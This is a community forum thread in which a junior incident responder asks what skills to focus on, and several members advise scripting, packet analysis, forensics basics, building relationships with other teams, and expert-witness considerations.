cancel
Showing results for 
Show  only  | Search instead for 
Did you mean: 
cancel
Showing results for 
Show  only  | Search instead for 
Did you mean: 
mustninty
Newcomer I

I have 1 year of Incident Response under my belt, what should I start concentrating on?

So I have one year under my belt and I don't feel like I'm drinking from a fire house any more, just a regular hose (on full blast). I have gotten to the point where I want to start to move from just learning basics and start to focus on things, maybe one certain thing that an incident handler should know, I'm just not sure where to start. My day-to-day mostly has to do mainly with network analysis which has been great for getting my network skills level up and very little end point. I don't know any scripting but have become good at finding Power Shell scripts and tailoring them for my environment. I know this is a loaded question and a lot of people will say too hard of a question to answer but any input to help me focus my time would be appreciated, thanks.

9 Replies
Brewdawg
Contributor I

Not sure what your current skills are but from my time in IR here are the things that I would recommend, mix of hard and soft skills:

 

1. Work on learning PowerShell or Perl scripting to make creating automation tools easier

2. Get familiar with WireShark and Packet Captures, if not already

3. Find good intel feeds and work on getting the company to take a more proactive rather than reactive stance

4. Foster relationships with other teams so that when that major event happens you have contacts to immediately pull together

5. Any tools that you don't manage, but have access to, work with the admins to learn as much about the tool and the information that you can get from it.  - I had a great ArcSight admin at my last job that taught me a lot of the basics of the tool, and the more I used it the better I was able to get the information I needed.  Eventually, got elevated permissions to the tool that allowed me to do even more.

 

Find an area of IR that you really like, or that sounds interesting and start studying up on it, and start networking with others that are in that area of IR. Things like Pen Testing, Forensics, etc.

 

Hope this helps a little, and good luck in your IR journey.

mustninty
Newcomer I

I have been trying to stay in Wireshark most days if for no other reason then to see what traffic is supposed to look like and get comfortable with it. I have touched on forensics a little bit and that did seem to be the most interesting so far. Your reply did help, thanks for taking the time, I know it's a big question.

CISOScott
Community Champion

Forensics looks glamorous on TV, not so much in real life. You HAVE to have keen attention to detail; be able to perform the same steps over and over, in  a repeatable, predictable fashion; and know how to document what you find without putting your opinion in it. Unless you clearly state "That it is of the investigators opinion that such and such happened....."

 

It can be a fun position, just know the best people in it really love details and being able to provide facts.

mustninty
Newcomer I

OK so maybe not Forensics, lol. It did look interesting but I don't know how well I would do in a very detail oriented position. Not that I'm sloppy but it is not my best quality.

CISOScott
Community Champion

Don't get me wrong, I think IR people should definitely learn forensics at a basic level so they can be careful enough when performing the initial response as to not accidentally destroy or alter evidence.

 

You should try different aspects of information security to find out what you like. I like it all and that is why a CISO position suits me well. I would also learn some system administration stuff too. Knowing how something is supposed to work can help you determine why it didn't work as expected or was violated by someone who got it to perform in an unexpected manner.

 

The key is to find what YOU like to do.

mustninty
Newcomer I

Great advice, thank you.

rslade
Influencer II

> CISOScott (Advocate I) posted a new reply in Career on 11-14-2018 01:27 PM in the (ISC)² Community :

> Forensics looks glamorous on TV, not so much in real life.

Amen.

> Unless you clearly state "That it
> is of the investigators opinion that such and such happened....."

And not always then. If it ends up in court (and, in forensics, you always have to
assume that it *might* end up in court) you can't give an opinion unless you are
an expert witness. The rules vary: in the US the judge gets to decide who is an
expert (but you do have to prove your background and experience). In the UK,
for example, you can't be an expert witness if you are a cop, because there is an
automatic assumption of bias. (In the US, they don't care about bias in experts.)

Oh, and these rules are only for Common Law jurisdictions, for Civil Law other
rules apply ...

====================== (quote inserted randomly by Pegasus Mailer)
rslade@vcn.bc.ca slade@victoria.tc.ca rslade@computercrime.org
A teacher is one who makes himself progressively unnecessary.
- Thomas Carruthers
victoria.tc.ca/techrev/rms.htm http://twitter.com/rslade
http://blogs.securiteam.com/index.php/archives/author/p1/
https://is.gd/RotlWB

............

Other posts: https://community.isc2.org/t5/forums/recentpostspage/user-id/1324864413

This message may or may not be governed by the terms of
http://www.noticebored.com/html/cisspforumfaq.html#Friday or
https://blogs.securiteam.com/index.php/archives/1468
mustninty
Newcomer I

Great info and yes I plan to try and touch on everything out there in the cyber security field so that I'm not completely lost on any one thing.

rslade
Influencer II

> mustninty (Newcomer I) posted a new reply in Career on 11-19-2018 01:26 PM in

> Great info and yes I plan to try and touch on everything
> out there in the cyber security field so that I'm not completely lost on any one
> thing.

Basically, that's what the CISSP is all about ...

====================== (quote inserted randomly by Pegasus Mailer)
rslade@vcn.bc.ca slade@victoria.tc.ca rslade@computercrime.org
We are generally the better persuaded by the reasons we discover
ourselves than by those given to us by others. - Blaise Pascal
victoria.tc.ca/techrev/rms.htm http://twitter.com/rslade
http://blogs.securiteam.com/index.php/archives/author/p1/
https://is.gd/RotlWB

............

Other posts: https://community.isc2.org/t5/forums/recentpostspage/user-id/1324864413

This message may or may not be governed by the terms of
http://www.noticebored.com/html/cisspforumfaq.html#Friday or
https://blogs.securiteam.com/index.php/archives/1468